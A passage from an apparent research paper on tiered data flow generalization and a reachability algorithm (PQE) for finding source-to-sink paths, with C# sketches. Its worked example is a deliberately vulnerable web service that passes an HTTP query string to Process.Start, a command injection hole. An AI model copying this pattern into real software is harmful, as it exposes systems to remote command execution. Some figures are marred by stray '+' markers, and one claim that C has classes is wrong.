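in-memory form for versioned SSA variables and their def-use edges, along with
the kind of root-to-leaf traversal described in the next paragraph. The types
and names used here are illustrative assumptions and are not part of the
Phoenix framework.

using System.Collections.Generic;

// A versioned SSA variable (for example x_1 or x_2) or a phi pseudo-instruction.
public sealed class SsaNode
{
    public string Name;                              // e.g. "x_2" or "phi(x_1, x_3)"
    public List<SsaNode> Uses = new List<SsaNode>(); // def-use edges to later uses
}

public static class SsaPaths
{
    // Enumerate every distinct data flow path from a root definition (a node
    // with no prior definition) down to a leaf variable (no subsequent uses).
    public static IEnumerable<List<SsaNode>> Enumerate(SsaNode root)
    {
        return Walk(root, new List<SsaNode> { root });
    }

    private static IEnumerable<List<SsaNode>> Walk(SsaNode node, List<SsaNode> path)
    {
        if (node.Uses.Count == 0)
        {
            // A leaf was reached; the accumulated path is one distinct path.
            yield return new List<SsaNode>(path);
            yield break;
        }

        foreach (SsaNode use in node.Uses)
        {
            if (path.Contains(use))
                continue; // ignore back edges introduced by phi functions in loops

            path.Add(use);
            foreach (List<SsaNode> found in Walk(use, path))
                yield return found;
            path.RemoveAt(path.Count - 1);
        }
    }
}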

Obtaining distinct data flow paths at the instruction tier can be accomplished
by traversing an SSA graph for a given procedure starting from each root
variable, which has no prior definitions, and proceeding until each reachable
leaf variable, which has no subsequent uses, is encountered along each data
flow path. The end result of this traversal is the complete set of data flow
paths found within the context of a given procedure.

One of SSA's limitations is that it is only designed to work intraprocedurally
and therefore makes no effort to describe the behavior of passing data between
procedures, such as through input and output parameters. In order to provide
an accurate, distinct path data flow representation, one must take into
account interprocedural data flow. One method of accomplishing this is to
generalize the concept of SSA's phi function and use it to represent formal
parameters. In this way, the phi function can be used to represent data flow
merges that happen as a result of data passing as input or output parameters
when a procedure is called. A phi function can be created to represent each
formal input and output parameter for a procedure, thus linking definitions of
parameters at a call site to actual parameter uses in a callee. Reps,
Horwitz, and Sagiv describe a concept similar to this[13].

In addition to using phi functions to link the definitions and uses of formal
parameters, it is also necessary to fracture data flow paths at call sites
that are found within a procedure. This is necessary because data flow paths
collected using SSA information will convey a relationship between the input
parameters passed to a procedure and the output parameters returned by a
procedure. This is the case because a call instruction at a call site appears
to use input parameters and define output parameters, thus creating an
implicit link between input and output parameters. Since SSA information is
obtained intraprocedurally, it is not possible to know in advance whether or
not an input parameter will influence an output parameter.

To fracture a data flow path, the instructions that define input parameters
passed at a given call site are instead linked directly to the associated
formal input parameter phi functions that are found in the context of the
target procedure. Likewise, instructions that use output parameters
previously defined by the call instruction are instead linked directly to the
associated formal output parameter phi functions found in the context of the
target procedure. This has the effect of breaking the original data flow path
into two disconnected data flow paths at the call site location. The linking
of actual parameters and call site parameters with formal parameters has been
illustrated in previous literature. Horwitz, Reps, and Binkley used this
concept during the construction of a system dependence graph (SDG)[7]. The
concept of creating symbolic variables that are later used to link information
together is not new[14]. Figure 2 provides an example of what a conventional
and fractured data flow path might look like.

 Conventional Fractured

 .---------. .---------.
 | ldarg.0 | | ldarg.0 |
 `---------` `---------`
 | |
 V V
 .---------. .---------.
 | call g | | fin(x) |
 `---------` `---------`
 |
 | ------------------
 V
 .---------. .---------.
 | stloc.0 | | fout(g) |
 `---------` `---------`
 |
 V
 .---------.
+ | stloc.0 | + `---------` + + Figure 2 + Fracturing a data flow path at a call + site. Call instructions no longer act + as the producers or receivers of data + that is passed between procedures. + +Using the fracturing concept, the instruction tier's path-sensitive data flow +information for a given procedure becomes disconnected. This helps to improve +the overall accuracy of the data flow paths that are conveyed. Fracturing +also has the added advantage of making it possible to use formal parameter phi +functions to dynamically link a caller and a callee at runtime. This makes it +possible to identify context-sensitive interprocedural data flow paths at the +granularity of an instruction. This ability will be described in more detail +when the reachability algorithm is described in section 3. + +With an understanding of the benefits of fracturing, it is now possible to +define the general form that data flow paths may take at the instruction tier. +This general form is meant to describe the structure of data flow paths at the +instruction tier in terms of the potential set of origins, transient, and +terminal points with respect to the general instruction types. Based on the +description given above, it is possible to categorize instructions into a few +general types. Using these general instruction types, the general form of +instruction data flow paths can be captured as illustrated by the diagram in +figure 3. + +value: Defines or uses a data value +compare: Compares a data value +fin: Pseudo instruction representing a formal input parameter +fout: Pseudo instruction representing a formal output parameter + + + .---------. .---------. .---------. + | value | | fin | | fout | + `---------` `---------` `---------` + \ | / + `---------|-----------` + V + .--------------. + | value | + | compare | + | ... | + `--------------` + | + .------------|---------.-------------. + V V V V + .---------. .---------. .---------. .---------. + | value | | fin | | fout | | compare | + `---------` `---------` `---------` `---------` + + Figure 3 + General forms of data flow paths at the instruction tier + +Based on this general description of instruction data flow paths, it is +helpful to consider a concrete example. Consider the example source code +described below which shows the implementation of the f function. + +static public int f(int x) +{ + return (x >= 0) ? g(x) : x + 1; +} + +This function is intentionally very simple so as to limit the number of data +flow paths that must be represented visually. Using the concepts described +above, the instruction data flow paths that would be created as a result of +analyzing this procedure are shown in figure 4. Note that the call site for +the g function results in two disconnected data flow paths. The end result is +that there are four unique data flow paths within this procedure. + + + .----------. + | fin(f,x) | + `----------` + / / | + / / | + V | V + .----------. | .----------. .----------. + | ldarg.0 | | | ldarg.0 | | ldc | + `----------` | `----------` `----------` + | | | / + | | | / + | | V V +.------. | | .----------. .----------. +| ldc | | | | add | | fout(g) | +`------` | | `----------` `----------` + \ | | \ \ / + \ | | \ \ / + V V V V V V + .-------. .----------. .--------. + | brcmp | | ldarg.0 | | ret | + `-------` `----------` `--------` + | | + | | + V V + .----------. .---------. + | fin(g,x) | | fout(f) | + `----------` `---------` + + Figure 4 + Instruction tier data flow paths for the example code. 
    The context of these data flow paths is the f function.

2.2) Basic Block Tier

Once the complete set of data flow paths is identified at the instruction
tier for a given procedure, the next step is to generalize data flow
information to the basic block tier. At the basic block tier, instruction
data flow paths should be generalized to show path-sensitive data flow
interactions between basic blocks rather than instructions. This level of
generalization reduces the amount of information needed to represent data flow
paths. For example, there are many cases where data will be passed between
multiple instructions within the same basic block. Using basic block tier
generalization, those individual operations can be generalized and represented
as a single basic block. The generalized basic block data flow paths can then
be persisted for subsequent use when determining reachability in much the same
fashion that was used at the instruction tier.

Since the instruction tier's data flow information has been fractured and
parameters passed at call sites have been tied to phi functions, an approach
must be defined to preserve this information at the basic block tier during
generalization. An easy way of preserving this information is to define the
formal parameters which represent input and output parameters as being
contained within distinct pseudo blocks. For example, the phi functions
representing formal input parameters can exist within a formal entry pseudo
block. Likewise, the phi functions representing formal output parameters can
exist within a formal exit pseudo block. Both pseudo blocks can then be tied
to the procedure associated with the formal parameters. Defining the
underlying instruction tier phi functions in this way makes it trivial to
retain information that will be needed to define context-sensitive
interprocedural data flow at less-specific generalization tiers. Like the
instruction tier, it is possible to dynamically link data passed to a pseudo
block in a caller's context to subsequent uses in a callee's context. Figure
5 shows the general form that basic block data flow paths may take.

 .---------. .---------. .---------.
 | fin | | fout | | block |
 `---------` `---------` `---------`
 \ | /
 .`-------+--------'.
 V V V
 .---------. .---------. .---------.
 | fin | | fout | | block |
 `---------` `---------` `---------`

    Figure 5
    General forms of data flow paths at the basic block tier

The act of generalizing instruction data flow paths means that two or more
distinct instruction data flow paths may produce the same basic block data
flow path. When this occurs, only one basic block data flow path should be
defined since it will effectively capture the information conveyed by the set
of distinct instruction data flow paths. Each corresponding instruction data
flow path should still be associated with a single basic block data flow path.
This association makes it possible to show the set of instruction data flow
paths that have been generalized by a specific basic block data flow path.
The association can be persisted in a normalized database by creating a
one-to-many link table between basic block and instruction data flow paths.
Figure 6 provides an example of what would happen when generalizing the
instruction data flow paths described in figure 4.

 .----------.
 | fin(f,x) |
 `----------`
 |
 .----------+----------.
 V V V
 .----------. .----------. .----------.
 | block 1 | | block 2 | | block 3 |
 `----------` `----------` `----------`
 | | |
 V | |
 .----------. | |
 | fin(g,x) | | |
 `----------` | |
 V V
 .----------. .----------.
 | fout(g) |-->| block 4 |
 `----------` `----------`
 |
 V
 .----------.
 | fout(f) |
 `----------`

    Figure 6
    Basic block tier data flow paths obtained by generalizing
    the instruction data flow paths described in figure 4. The
    context for these data flow paths is the f function.
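
As a rough illustration of this generalization step, the sketch below collapses
an instruction tier data flow path into a basic block tier path by mapping each
instruction to its containing block and removing consecutive repeats. The types
shown are hypothetical stand-ins for whatever representation is actually
persisted.

using System.Collections.Generic;

public sealed class Instruction
{
    public string Text;    // e.g. "ldarg.0"
    public string BlockId; // containing block, or a pseudo block id for fin/fout
}

public static class BasicBlockGeneralizer
{
    // Generalize an instruction tier data flow path to a basic block tier path
    // by mapping each instruction to its containing block and collapsing runs
    // of instructions that share the same block.
    public static List<string> Generalize(IReadOnlyList<Instruction> instructionPath)
    {
        var blockPath = new List<string>();
        foreach (Instruction instruction in instructionPath)
        {
            if (blockPath.Count == 0 ||
                blockPath[blockPath.Count - 1] != instruction.BlockId)
            {
                blockPath.Add(instruction.BlockId);
            }
        }
        return blockPath;
    }
}

Two distinct instruction paths that collapse to the same block path would then
be linked to a single persisted basic block path, as described above.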

2.3) Procedure Tier

Generalizing data flow paths from the basic block tier to the procedure tier
further reduces the amount of information needed to show data flow behavior.
Procedure tier data flow paths are meant to show how data is passed between
procedures through formal parameters. This covers scenarios such as passing a
procedure's formal input parameter to a child procedure's formal input
parameter, using the formal output parameter of a child procedure as the
formal input parameter to another called procedure, and so on. These
behaviors are all represented within the context of a particular procedure.

Based on these constraints, only two classes of basic block data flow paths
need to be considered. The first class involves data traveling from any block
to a formal input or output parameter, thus showing interprocedural flows.
The second class involves data traveling from a formal input or formal output
parameter to a terminal point in a procedure. This effectively eliminates any
intraprocedural data flows that are not carried over to another procedure in
some form. Since data flow information about which formal parameters are used
or defined is conveyed by basic block data flow paths, it is possible to
simply generalize this data flow information to show data flowing to formal
parameters within the context of a given procedure. While it may be tempting
to think that one must only show data flow paths between two formal
parameters, it is also necessary to show data flow paths that originate from
data that is locally defined within a procedure, such as through a local
variable which is not populated by a formal parameter. As such, the general
form that data flow paths may take at the procedure tier is illustrated by
figure 7. Figure 8 provides an example of what would happen when generalizing
the basic block data flow paths described in figure 6.

 .---------. .---------. .---------.
 | fin | | fout | | origin |
 `---------` `---------` `---------`
 \ | /
 .`-------+--------'.
 V V V
 .---------. .---------. .---------.
 | fin | | fout | | origin |
 `---------` `---------` `---------`

    Figure 7
    General forms of data flow paths at the procedure tier

 .----------. .-----------. .----------.
 | fin(f,x) | | origin(f) | | fout(g) |
 `----------` `-----------` `----------`
 | \ | /
 | `--------+----------'
 V V
 .----------. .-----------.
 | fin(g,x) | | fout(f) |
 `----------` `-----------`

    Figure 8
    Procedure tier data flow paths obtained by generalizing the
    basic block data flow paths described in figure 6. The context
    for these data flow paths is the f function.

Procedure data flow paths may generalize multiple basic block data flow paths
and thus can make use of a one-to-many link table to illustrate this
association. While generalizing data flow paths to the procedure tier is
trivial, the challenging aspect comes when determining reachability. This
will be discussed in more detail in section 3.
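
The one-to-many associations mentioned at each tier lend themselves to a very
simple storage model. The sketch below uses an in-memory dictionary as a
stand-in for the normalized link table; the integer path identifiers and the
Link/Elaborate names are assumptions made purely for illustration.

using System.Collections.Generic;

// A minimal in-memory stand-in for the normalized one-to-many link table that
// associates each less specific data flow path (e.g. a procedure path) with
// the more specific paths it generalizes (e.g. basic block paths).
public sealed class OneToManyLinkTable
{
    private readonly Dictionary<int, List<int>> links = new Dictionary<int, List<int>>();

    // Record that lessSpecificPathId generalizes moreSpecificPathId.
    public void Link(int lessSpecificPathId, int moreSpecificPathId)
    {
        if (!links.TryGetValue(lessSpecificPathId, out var children))
            links[lessSpecificPathId] = children = new List<int>();
        children.Add(moreSpecificPathId);
    }

    // Expand a qualified set of less specific paths into the more specific
    // paths they generalize; this is the elaboration step used in section 3.
    public IEnumerable<int> Elaborate(IEnumerable<int> qualifiedPathIds)
    {
        foreach (int id in qualifiedPathIds)
            if (links.TryGetValue(id, out var children))
                foreach (int child in children)
                    yield return child;
    }
}

The same structure, populated between each pair of adjacent tiers, is what
allows the reachability algorithm in section 3 to expand a qualified set of
less specific paths into the more specific paths they generalize.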
+ +2.4) Data Type Tier + +Using data flow information obtained from the procedure tier, it is sometimes +possible, depending on language features, to generalize data flow information +to the data type tier. Generalizing to the data type tier is meant to show +how formal parameters are passed between data types within the context of a +given data type. This relies on the underlying language having the ability to +associate procedures with data types. For example, object-oriented languages +are all capable of associating procedures with data types, such as through +classes defined in C++, C, and other languages. In the case of languages +where data types do not have procedures, it may instead be possible to +associate procedures with the name of the source file that contains them. In +both cases, it is possible to show formal parameters passing between elements +that act as containers for procedures, regardless of whether the underlying +elements are true data types. + +The benefit of generalizing data flow information at the data type tier is +that it helps to further reduce the amount of data flow information that must +be represented. Since the small example source code that has been used to +illustrate generalizations at each tier only involves passing formal +parameters within the same data type, it is useful to consider an alternative +example which involves passing data between multiple data types. + +class Company { + void AddEmployee(int num) { + Person employee = new Person(num); + employees.Add(employee); + Console.WriteLine("New employee {0}", employee); + } + int EmployeeCount() { + return employees.Count; + } + private ArrayList employees; +} + +Figure 9 shows the data type data flow paths for the example code shown above. +It is important to note that unlike previous tiers, the specific formal +parameters that are being passed between types is not preserved. Instead, +only the fact that formal parameters are passed between data types is +retained. In this manner, fin indicates a data type's formal input parameter +and fout indicates a data type's formal output parameter. + + + .---------------------. .--------------. + | fin(System.Console) |<-----| fout(Person) | + `---------------------` `--------------` + | + .-----------------------. / + | fin(System.ArrayList) |<---------` + `-----------------------` + + .--------------. + | fin(Company) | + `--------------` + | + V + .-------------. + | fin(Person) | + `-------------` + + .------------------------. .---------------. + | fout(System.ArrayList) |---->| fout(Company) | + `------------------------` `---------------` + + Figure 9 + Data type tier data flow paths obtained by generalizing the + procedure tier data flow paths. The context for these data + flow paths is the Company data type. + +In a fashion much the same as previous generalization tiers, a single data +type data flow path can represent multiple underlying procedure data flow +paths. Each generalized procedure data flow path can be associated with its +corresponding data type data flow path through a one-to-many link table in a +normalized database. + +2.5) Module Tier + +Generalizing data flow information to the module tier is meant to show how +data flows between distinct modules. As with each step in the generalization +process, the module tier data flow paths lose much of the information that is +conveyed at more specific tiers. 
Figure 10 shows the module tier data flow paths
that would be defined when generalizing the data type tier data flow paths
illustrated in figure 9.

 .------------------. .-----------------.
 | fin(Company.dll) | | fin(System.dll) |
 `------------------` `-----------------`
 | ^
 V |
 .-----------------. .------------------.
 | fin(Person.dll) | | fout(Person.dll) |
 `-----------------` `------------------`

 .------------------. .-------------------.
 | fout(System.dll) |----->| fout(Company.dll) |
 `------------------` `-------------------`

    Figure 10
    Module tier data flow paths obtained by generalizing the
    data type tier data flow paths. The context for these data
    flow paths is the Company.dll module.

2.6) Abstract Tiers

Once data flow paths have been generalized from the instruction tier through
the module tier, it is no longer possible to create additional concrete
generalizations for most runtime environments. An exception to this is
managed code, which has an additional concrete assembly tier. Even though it
may not be possible to establish concrete generalizations, it is possible to
define abstract generalizations. An abstract generalization attempts to show
data flow relationships between abstract elements. A good example of an
abstract element would be a logical component which is defined in the
architecture of a given application. For example, a VPN client application
might be composed of a user interface component and a networking component,
each of which may consist of multiple concrete modules. By defining logical
components and associating concrete modules with each component, it is
possible to further generalize information beyond the module tier.

Given the example described above, it may be prudent to define two abstract
generalization tiers. The first abstract tier is the component tier. In this
context, a component is defined as a logical software component that contains
one or more concrete modules. The component tier makes it possible to
illustrate data flow between conceptual components within an application as
derived from how data flows between concrete modules. The second abstract
tier is the application tier. The application tier can be used to illustrate
how data is passed between conceptual applications. For example, a web
browser application passes data in some form to a web server application, both
of which consist of conceptual components which, in turn, consist of concrete
modules.

The caveat with abstract generalization tiers is that it must be possible to
illustrate data flow between what may otherwise be disjoint concrete elements.
The reason for this is that, often times, the paths that data will take
between two modules which belong to different logical components will be
entirely indirect with respect to one another. For this reason, it is
necessary to devise a mechanism to bridge data flow paths between concrete
software elements that belong to each logical component or application. A
particularly useful example of an approach that can be taken to bridge two
distinct components can be found in web services.

In a web services application, it is often common to have a client component
and a server component. The two components pass data to one another through
an indirect channel, such as through a web request. For this reason, it is
not immediately possible to show direct data flow paths from a web client
component to a web service component. To solve this problem, one can define a
mechanism that bridges the formal parameters associated with the web service
method that is being invoked. In this manner, the formal input parameters for
a web service method found on the client side can be implicitly linked and
shown to define the formal input parameters received on the web service side.
By illustrating data flow at a concrete tier, it is possible to generalize
data flow behaviors all the way up through the abstract tiers.
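
One way such a bridge might be implemented for the SOAP-style web services
used in the example later in this paper is sketched below: client proxy
methods marked with SoapDocumentMethod are paired with service methods marked
with WebMethod by method name, and an implicit link is produced from each
client-side formal input parameter to the corresponding server-side formal
input parameter. The name-based pairing is an assumption; a real
implementation would also need to account for namespaces and overloads.

using System;
using System.Collections.Generic;
using System.Reflection;
using System.Web.Services;
using System.Web.Services.Protocols;

public static class WebServiceBridge
{
    // Pair [SoapDocumentMethod] proxy methods with [WebMethod] service methods
    // that share a name and yield one implicit link per positional parameter.
    // Each link bridges a formal input parameter across the HTTP channel.
    public static IEnumerable<(ParameterInfo Client, ParameterInfo Service)> Bridge(
        Type clientProxy, Type service)
    {
        foreach (MethodInfo clientMethod in clientProxy.GetMethods())
        {
            if (clientMethod.GetCustomAttribute<SoapDocumentMethodAttribute>() == null)
                continue;

            MethodInfo serviceMethod = service.GetMethod(clientMethod.Name);
            if (serviceMethod == null ||
                serviceMethod.GetCustomAttribute<WebMethodAttribute>() == null)
                continue;

            ParameterInfo[] clientParams = clientMethod.GetParameters();
            ParameterInfo[] serviceParams = serviceMethod.GetParameters();
            int count = Math.Min(clientParams.Length, serviceParams.Length);

            for (int i = 0; i < count; i++)
                yield return (clientParams[i], serviceParams[i]);
        }
    }
}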

The benefit of describing data flow behavior at abstract tiers is that it
makes it possible to derive data flow behaviors between abstract software
elements rather than strictly focusing on concrete software elements. This is
useful when attempting to view an application's behavior at a glance rather
than worrying about the specific details relating to how data is passed. For
example, this could be used to help validate threat models which describe how
data is expected to be passed between abstract components within an
application.

When generalizing information at abstract tiers, the only information that can
be conveyed, at least based on the approach described thus far, is whether or
not a component or application is passing data through a formal input or
formal output parameter. The specifics of which formal parameters are passed
are no longer available for use in generalization. Using the example shown at
the data type tier, one might assume the following component associations:
Company.dll and Person.dll, which contain the Company data type and Person
data type, are part of the user interface component of a human resources
application. The classes used from system libraries can be generically
grouped as belonging to an external library component. Using these groupings,
the component data flow paths may be represented as shown in figure 11.

 .------------------------. .-----------------------.
 | fout(External Library) | | fin(External Library) |
 `------------------------` `-----------------------`
 | ^
 V |
 .----------------------. .---------------------.
 | fout(User Interface) | | fin(User Interface) |
 `----------------------` `---------------------`

    Figure 11
    Component tier data flow paths obtained by generalizing the
    module tier data flow paths. The context for these data flow
    paths is the user interface component.

As with all previously described generalization tiers, a single component data
flow path may represent multiple module data flow paths. The single component
data flow path should be associated with each corresponding module data flow
path through a one-to-many link table in a normalized database.

3) Reachability

The real benefit of the generalizations described in section 2 can be realized
when attempting to solve a graph reachability problem. By generalizing data
flow behaviors to both abstract and concrete generalization tiers, it is
possible to reduce the amount of information that must be represented when
attempting to determine graph reachability. This is further improved by the
fact that data flow paths found at less-specific generalization tiers can be
used to progressively qualify potential data flow paths at more-specific
generalization tiers. This qualification is possible due to the fact that
less-specific data flow paths are associated with more-specific data flow
paths at each generalization tier through a one-to-many link table, thus
permitting trivial expansion.
The benefit of qualifying data flow paths in
this fashion is that only the minimal set of information needed to determine
reachability must be considered at once at each generalization tier. This can
drastically reduce the physical resources required to solve a graph
reachability problem by effectively limiting the size of a graph. This
general approach is captured by the Progressive Qualified Elaboration (PQE)
algorithm described below. This concept is very similar to the ideas outlined
by Schultes' highway hierarchy, which is used to optimize fast path discovery
when identifying travel routes in road networks[16].


PQE(Elements, SourceDescriptor, SinkDescriptor)
    Paths := 0
    Graph := BuildGraph(Elements)

    while Graph != 0
        SourceVertices := Vertices(Graph, SourceDescriptor)
        SinkVertices := Vertices(Graph, SinkDescriptor)
        Paths := Reachability(Graph, SourceVertices, SinkVertices)
        ElaboratedPaths := Elaborate(Paths)
        Graph := BuildGraph(ElaboratedPaths)
    end

    return Paths
end

For the purposes of this paper, graph reachability is restricted to
determining realizable paths between two flow descriptors: a source and a
sink. A flow descriptor provides information that is needed to identify
corresponding vertices within a graph at each generalization tier. The tables
in figure 12 and figure 13 show the information needed to identify source and
sink vertices at each generalization tier for the example that will be
described in this section.

The PQE algorithm itself requires three parameters. The first parameter,
Elements, contains the set of generalized elements to be analyzed. For
example, it may contain the set of target modules that should be analyzed.
The second and third parameters, SourceDescriptor and SinkDescriptor,
represent the source and sink flow descriptors, respectively.

The first step taken by the algorithm is to define Paths as an empty set.
Paths will be used to contain the set of reachable paths between an actual set
of sources and sinks at a given generalization tier. After Paths has been
initialized, Graph is initialized to a flow graph that conveys data flow
relationships between the set of elements provided in Elements. The approach
taken to construct the flow graph involves retrieving persisted data flow
information for the appropriate generalization tier. Once Paths and Graph
have been initialized, the qualified elaboration process can begin.

For each loop iteration, a check is made to see if Graph is an empty graph
(contains no vertices). If Graph is empty, the loop terminates. If Graph is
not an empty graph, reachable paths between the actual set of sources and
sinks are determined. This is accomplished by first identifying the vertices
in Graph that are associated with the flow descriptors SourceDescriptor and
SinkDescriptor at the current generalization tier. The actual set of sources
and sinks found to be associated with these descriptors are stored in
SourceVertices and SinkVertices, respectively. With the set of actual source
and sink vertices identified, a reachability algorithm, Reachability(), can be
used to determine the set of reachable paths in the flow graph between the two
sets of vertices. The result of this determination is stored in Paths. The
final step in the iteration involves using qualified elaboration to construct
a new flow graph containing more-specific data flow paths which are qualified
by the set of data flow paths encountered in the reachable paths found in
Paths. This set is then elaborated to a subset that contains the associated
data flow paths from the next, more specific tier, such as by elaborating to a
subset of basic block data flow paths from a more general set of procedure
data flow paths. The result of the elaboration is stored in ElaboratedPaths.
Finally, a new flow graph is constructed and stored in Graph using the
elaborated set of flow paths contained within ElaboratedPaths.
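
As a rough translation of the pseudocode above into code, the sketch below
shows what the loop might look like. The graph construction, vertex selection,
reachability, and elaboration routines are supplied as delegates, since their
implementations depend on how the data flow information is persisted; this is
an illustration rather than a reference implementation.

using System;
using System.Collections.Generic;

public static class Pqe
{
    // A sketch of the PQE loop. TGraph, TPath, TVertex and TDescriptor are
    // whatever concrete types a particular implementation uses.
    public static IReadOnlyList<TPath> Run<TGraph, TPath, TVertex, TDescriptor>(
        IEnumerable<TPath> elements,
        TDescriptor sourceDescriptor,
        TDescriptor sinkDescriptor,
        Func<IEnumerable<TPath>, TGraph> buildGraph,
        Func<TGraph, bool> isEmpty,
        Func<TGraph, TDescriptor, ISet<TVertex>> vertices,
        Func<TGraph, ISet<TVertex>, ISet<TVertex>, IReadOnlyList<TPath>> reachability,
        Func<IReadOnlyList<TPath>, IEnumerable<TPath>> elaborate)
    {
        IReadOnlyList<TPath> paths = new List<TPath>();
        TGraph graph = buildGraph(elements);

        while (!isEmpty(graph))
        {
            ISet<TVertex> sources = vertices(graph, sourceDescriptor);
            ISet<TVertex> sinks = vertices(graph, sinkDescriptor);

            // Reachable paths between the actual sources and sinks at this tier.
            paths = reachability(graph, sources, sinks);

            // Expand to the qualified, more specific paths of the next tier and
            // build the next graph from them; an empty graph ends the loop.
            graph = buildGraph(elaborate(paths));
        }

        return paths;
    }
}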

When it is not possible to obtain a more-detailed flow set, such as when the
instruction tier is reached, an empty graph is created and the algorithm
completes by returning Paths. In the final iteration, Paths contains the most
detailed set of reachable data flow paths found between the source and sink
flow descriptors. The benefit of approaching graph reachability problems in
this fashion is that only a subset of the elements at any generalization tier
need to be considered at once. These subsets are dictated by the set of
reachable data flow paths found at each preceding generalization tier. In
this manner, the subset of procedure data flow paths that need to be
considered would be effectively qualified by the set of data types and modules
found to be involved in data flow paths between the source and sink flow
descriptors at less-specific tiers.

For the purposes of this paper, the algorithm is designed to consider
realizable paths at each generalization tier in a manner that is similar to
the concept described by Reps et al. This involves traversing the graph in a
context-sensitive fashion. To accomplish this, the algorithm keeps a scope
stack at each generalization tier. The scope may be an assembly, a type, or a
procedure. When data is passed through to a formal input parameter, the scope
for the formal input parameter is pushed onto the stack. When data is
returned through a formal output parameter to another location, the algorithm
ensures that the scope that is being returned to is the parent scope. In this
way, only realizable paths are considered at each generalization tier, which
limits the number of paths that must be considered and also has the benefit of
producing more accurate results.

The specific algorithm used for the Elaborate() function involves using the
set of data flow paths found at a less-specific tier to identify the set of
more-specific data flow paths that have been generalized. This is
accomplished by simply using the one-to-many link tables that were populated
during generalization to determine the subset of data flow paths that must be
considered at the next generalization tier. For example, elaborating from a
set of procedure data flow paths would involve determining the complete set of
basic block data flow paths that have been generalized by the affected set of
procedure data flow paths.

Based on this general description of the algorithm, it is useful to consider a
concrete example. This section provides a concrete illustration by
determining reachability between a source and a sink using an example web
application that consists of a web client and a web service component. This
is illustrated by progressively drilling down through each generalization tier
starting from the least-specific tier, the abstract tier, and working toward
the most-specific tier, the instruction tier. At each tier, a description of
the number of data flow paths that must be represented and the number of
reachable data flow paths found is given.
This particular example will attempt to determine +concrete reachable data flow paths between the return value of +HttpRequest.getQueryString and the first formal input parameter of +Process.Start. The implications of a reachable path between these two points +could be indicative of a command injection vulnerability within the +application. The tables in figure 12 and figure 13 show the flow descriptors for +the source and sink, respectively. These flow descriptors are used to +identify associated vertices at each generalization tier. + + +-------------+------------------------------+ + | Tier | Information | + +-------------+------------------------------+ + | Component | fout(Undefined) | + | Module | fout(System.Web.dll) | + | Data Type | fout(System.Web.HttpRequest) | + | Procedure | fout(get_QueryString, 0) | + | Basic Block | fout(get_QueryString, 0) | + | Instruction | fout(get_QueryString, 0) | + +-------------+------------------------------+ + + Figure 12 + Source flow descriptor for the return value of + HttpRequest.get_QueryString + + +-------------+---------------------------------+ + | Tier | Information | + +-------------+---------------------------------+ + | Component | fin(Undefined) | + | Module | fin(System.dll) | + | Data Type | fin(System.Diagnostics.Process) | + | Procedure | fin(Start, 0) | + | Basic Block | fin(Start, 0) | + | Instruction | fin(Start, 0) | + +-------------+---------------------------------+ + + Figure 13 + Sink flow descriptor for the first formal parameter + of Process.Start + +For this illustration, there is in fact a data flow path that exists from the +source descriptor to the sink descriptor. However, unlike conventional data +flow paths, this data flow path happens to cross an abstract boundary between +the two components. In this case, data is passed from the web client +component through an HTTP request to a method hosted by the web service +component. This path can be seen by first looking at a portion of the web +client code: + +class Program { + static void Main(string[] args) { + HttpRequest request = new HttpRequest( + "a","b","c"); + WebClient client = new WebClient(); + + client.ExecuteCommand( + request.QueryString["abc"]); + } +} +[WebServiceBinding] +public class WebClient : SoapHttpClientProtocol { + [SoapDocumentMethod] + public void ExecuteCommand(string command) { + Invoke("ExecuteCommand", + new object[] { command }); + } +} + +In this contrived example, data is shown as being passed from a query string +obtained from what is presumably a real HTTP request to the client portion of +the web service method ExecuteCommand. The web service application, in turn, +contains the following code: + +[WebService] +public class WebService { + [WebMethod] + public void ExecuteCommand(string command) { + System.Diagnostics.Process.Start(command); + } +} + +In conventional tools, it would not be possible to directly model this data +flow path because the data flow path is indirect. However, using a simple +methodology to bridge the client-side formal input parameters with the +server-side formal input parameters at the instruction tier, it is possible to +connect the two and represent data flow between the two conceptual software +elements at each generalization tier. The following sections will provide +visual examples of how the PQE algorithm narrows down and eliminates +unnecessary data flow paths at each generalization tier by progressively +qualifying data flow information. 
One thing to note about the graphs at each +tier is that implicit edges have been created between formal input and output +parameters that reside in external (un-analyzed) libraries. This is done +under the assumption that a formal input parameter may affect a formal output +parameter in some way in the context of the code that is not analyzed. If all +target code paths have been analyzed, then this is not necessary. The graphs +shown at each tier were automatically generated but have been modified to +allow them to fit within the margins of this document and in some cases +highlight important features. + +3.1) Abstract Tiers + +Abstract tiers represent the most general view of the data flow behaviors of +an application. The data flow behavior is modeled with respect to abstract +software elements, such as a component, rather than concrete software +elements, such as a module or a type. For this example, it is assumed that +the PQE algorithm begins by modeling data flow behaviors between conceptual +components in a web application. The web application is composed of two +manually defined abstract components, a Web Client and a Web Service. These +two components both rely on external libraries, as represented by the +Undefined component, which are outside of the scope of the application itself. +When starting at the abstract tier, all abstract data flow paths must be +considered as potential data flow paths. The component tier data flow graph +for this application is shown in figure 14. + + + .--------------------. + .------| origin(Web Client) | + | `--------------------` + V | + .----------------. | + | fin(Undefined) |<---. | + `----------------` \ | + .-^ | ^ | | + / V | | | + | .----------------. | | + | | fin(Undefined) | | | + | `----------------` | | + | \ | | + | `--. | | + | V | V + .------------------. .-----------------. + | fin(Web Service) |<---| fin(Web Client) | + `------------------` `-----------------` + | | ^ + V V | + .------------------. .------------------. + | fin(Web Service) | | fout(Web Client) | + `------------------` `------------------` + + Figure 14 + Complete compenet tier data flow graph for the + web application. + +Using the data flow graph shown in figure 14, PQE uses the Reachability() +algorithm to determine data flow paths between a formal output parameter in +the Undefined component and a formal input parameter in the Undefined +component. At this generalization tier, there are many different paths that +can be taken between these two components. This effectively results in the +qualification of nearly all of the assembly tier data flow paths. These data +flow paths are used to represent the data flow graph at the assembly tier. + +In this example, PQE offers no improvements at abstract tiers because it is a +requirement that all abstract data flow information be represented. Since the +amount of information required to represent abstract data flow is minimal, +this is not seen as a deficiency. Furthermore, for this particular example, +nearly all component data flow paths are found to be involved in reachable +paths. At worst, this is indicative that for small applications, it may not +be necessary to start the algorithm by looking at abstract data flow +information. Instead, one might immediately progress to the module or data +type tiers. 
+
+3.2) Module Tier
+
+The module tier uses the set of data flow paths found at the abstract
+component tier to construct a data flow graph that shows the data flow
+relationships between formal input and formal output parameters passed between
+modules. The graph is generated using the one-to-many table that was
+populated during generalization, which conveys the module data flow paths that
+were generalized by the set of qualified component data flow paths. For this
+particular example, nearly all of the module data flow paths were qualified as
+potentially being involved in a reachable path between the source and sink
+flow descriptor. The graph that is generated as a result is shown in figure
+15.
+
+                  [Figure 15: module tier data flow graph]
+
+Using this graph, the Reachability() algorithm is again employed to find paths
